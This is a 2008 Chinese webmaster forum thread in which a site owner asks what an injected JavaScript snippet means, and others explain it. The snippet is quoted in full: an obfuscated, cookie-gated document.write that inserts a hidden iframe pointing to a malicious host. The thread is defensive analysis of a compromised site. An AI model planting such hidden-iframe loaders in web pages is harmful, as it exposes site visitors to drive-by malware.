落伍者站长论坛 » 服务器技术及安全 » 服务器被挂马多了一串JS,请问高手是什么意思

hayaya 发表于 2008-7-10 23:47

服务器被挂马多了一串JS,请问高手是什么意思

<script>
;var ss=document.cookie;
var aa=ss.indexOf("showtable");
if(aa!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="showtable=true;expires="+expires.toGMTString();
document.write("<if"+"rAm"+"e sRc=ht"+"tp"+":/"+"/ba"+"t.0da"+"ybo"+"x.c"+"n/  "+"wid"+"th=1"+"00 hei"+"ght"+"=0></iF"+"ra"+"me>");};
</script>

卡巴斯基没反应，但360安全卫士会提示屏蔽了一个恶意代码和广告：[url]http://vistas01.cn/bbs/gm.htm[/url]

请高手帮忙分析下

hao32 发表于 2008-7-11 10:53

如果不是arp的话, 先找到这段代码在你网站文件里, 然后扫描下你的站点文件里是不是有木马文件, aspshell phpshell什么的

成龙之龙 发表于 2008-7-11 11:12

就是用JS写出:
<ifrAme sRc=http//bat.0daybox.cn/ width=100 height=0></iFrame>)

spidergood 发表于 2008-7-11 12:15

:D 这个挂马还搞得比较麻烦呢

hayaya 发表于 2008-7-12 00:01

谢谢各位高人指点！:D

chenwb_2001 发表于 2008-7-23 14:56

:)  js 挂frame马，360根据height weight -=0 判断的吧
总之就是

lvxuesj 发表于 2008-7-23 17:48

document.write("<if"+"rAm"+"e sRc=ht"+"tp"+":/"+"/ba"+"t.0da"+"ybo"+"x.c"+"n/  "+"wid"+"th=1"+"00 hei"+"ght"+"=0></iF"+"ra"+"me>");};


这个分开写而已。

王飞龙 发表于 2008-7-24 23:51

:o 麻烦呀

查看完整版本: 服务器被挂马多了一串JS,请问高手是什么意思